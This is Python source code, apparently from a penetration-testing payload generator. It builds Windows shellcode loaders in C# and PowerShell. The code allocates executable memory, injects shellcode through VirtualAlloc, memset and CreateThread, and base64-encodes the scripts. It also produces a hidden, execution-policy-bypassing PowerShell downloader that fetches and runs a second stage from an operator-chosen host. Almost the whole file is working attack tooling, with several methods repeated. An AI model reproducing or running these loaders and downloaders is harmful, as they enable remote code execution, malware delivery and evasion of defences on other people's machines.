def generate(self):
shellcode = self.shellcode.generate()
shellcode = "0" + ",0".join(shellcode.split("\\")[1:])
payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
payloadCode += "namespace payload { class Program { static void Main() {\n"
payloadCode += "byte[] s = {"+shellcode+"};"
payloadCode += "UInt32 funcAddr = VirtualAlloc(0, (UInt32)s.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
payloadCode += "Marshal.Copy(s, 0, (IntPtr)(funcAddr), s.Length);\n"
payloadCode += "IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; IntPtr pinfo = IntPtr.Zero;\n"
payloadCode += "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);\n"
payloadCode += "WaitForSingleObject(hThread, 0xFFFFFFFF);}\n"
payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId);
[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); } }\n"""
return payloadCode
def generate(self):
shellcode = self.shellcode.generate()
shellcode = ",0".join(shellcode.split("\\"))[1:]
baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)
powershell_command = unicode(baseString)
blank_command = ""
for char in powershell_command:
blank_command += char + "\x00"
powershell_command = blank_command
powershell_command = base64.b64encode(powershell_command)
payloadName = randomizer.randomString()
# write base64 payload out to disk
veil.PAYLOAD_SOURCE_PATH
secondStageName = veil.PAYLOAD_SOURCE_PATH + payloadName
f = open(secondStageName, 'w')
f.write("powershell -Enc %s\n" % (powershell_command))
f.close()
# give notes to the user
self.notes = "\n\tsecondary payload written to " + secondStageName + " ,"
self.notes += " serve this on http://%s:%s\n" % (
self.required_options["DownloadHost"][0],
self.required_options["DownloadPort"][0],
)
# build our downloader shell
downloaderCommand = "iex (New-Object Net.WebClient).DownloadString(\"http://%s:%s/%s\")\n" % (
self.required_options["DownloadHost"][0],
self.required_options["DownloadPort"][0], payloadName)
powershell_command = unicode(downloaderCommand)
blank_command = ""
for char in powershell_command:
blank_command += char + "\x00"
powershell_command = blank_command
powershell_command = base64.b64encode(powershell_command)
downloaderCode = "x86 powershell command:\n"
downloaderCode += "\tpowershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command
downloaderCode += "\n\nx64 powershell command:\n"
downloaderCode += "\t%WinDir%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command + "\n"
return downloaderCode
def generate(self):
self.shellcode = shellcode.Shellcode()
shellcode = self.shellcode.generate()
shellcode = ",0".join(shellcode.split("\\"))[1:]
baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)
powershell_command = unicode(baseString)
blank_command = ""
for char in powershell_command:
blank_command += char + "\x00"
powershell_command = blank_command
powershell_command = base64.b64encode(powershell_command)
payloadName = randomizer.randomString()
# write base64 payload out to disk
veil.PAYLOAD_SOURCE_PATH
secondStageName = veil.PAYLOAD_SOURCE_PATH + payloadName
f = open( secondStageName , 'w')
f.write("powershell -Enc %s\n" %(powershell_command))
f.close()
# give notes to the user
self.notes = "\n\tsecondary payload written to " + secondStageName + " ,"
self.notes += " serve this on http://%s:%s\n" %(self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0],)
# build our downloader shell
downloaderCommand = "iex (New-Object Net.WebClient).DownloadString(\"http://%s:%s/%s\")\n" %(self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0], payloadName)
powershell_command = unicode(downloaderCommand)
blank_command = ""
for char in powershell_command:
blank_command += char + "\x00"
powershell_command = blank_command
powershell_command = base64.b64encode(powershell_command)
downloaderCode = "x86 powershell command:\n"
downloaderCode += "\tpowershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command
downloaderCode += "\n\nx64 powershell command:\n"
downloaderCode += "\t%WinDir%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command + "\n"
return downloaderCode
def psRaw(self):
shellcode = self.shellcode.generate()
shellcode = ",0".join(shellcode.split("\\"))[1:]
baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)
return baseString
def psRaw(self):
shellcode = self.shellcode.generate()
shellcode = ",0".join(shellcode.split("\\"))[1:]
baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)
return baseString
